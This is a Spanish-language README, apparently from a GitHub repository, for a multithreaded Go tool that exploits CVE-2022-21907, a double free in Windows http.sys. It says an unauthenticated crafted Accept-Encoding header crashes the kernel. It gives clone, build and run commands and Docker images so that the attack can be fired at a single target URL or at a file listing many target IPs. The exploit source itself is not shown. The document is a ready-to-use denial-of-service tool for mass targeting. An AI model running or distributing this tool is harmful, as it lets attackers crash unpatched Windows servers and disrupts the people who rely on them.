
Aplicación Golang multihilo
CVE-2022-21907 - Double Free en el controlador http.sys.
Esta es una aplicación Golang de subprocesos múltiples que permite hacer solicitudes a algunos objetivos simultáneamente.
No es muy productiva con las solicitudes POST, pero proporciona casi un 30% de velocidad en comparación con un método lineal.
Un atacante no autenticado puede enviar una solicitud HTTP con una cabecera de solicitud HTTP "Accept-Encoding" que desencadena un double free en la lista de codificación desconocida dentro de la pila del protocolo HTTP (http.sys) para procesar paquetes, lo que resulta en un bloqueo del kernel.
Golang:
Golang:
1. git clone https://github.com/iveresk/cve-2022-21907.git
2. cd cve-2022-21907
3. go build cve-2022-21907.go -o /cve-2022-21907
4. chmod +x cve-2022-21907
5. ./cve-2022-21907 -t <targetURL> [or <targetFile>]
Compilación local con Docker:
1. git clone https://github.com/iveresk/cve-2022-21907.git
2. cd cve-2022-21907
3. nano input.txt [input here your target's IPs in the list]
4. docker build -t <tagName> . || docker build --build-arg INPUT_FILE=<default_target_filename> -t <tagName> .
[In Docker there is a default file named as "input.txt", but you may specify your own one]
5. docker run -it <tagName> || docker run -it -e INPUT_FILE=<target_filename> <tagName>
Repositorio Docker
docker pull masterrooot/cve-2022-21907:latest
docker run -it <tagName> || docker run -it -e INPUT_FILE=<target_filename> <tagName>
Windows Server 2019 y Windows 10 versión 1809:
Puedes contactarme libremente a través de Keybase para cualquier detalle.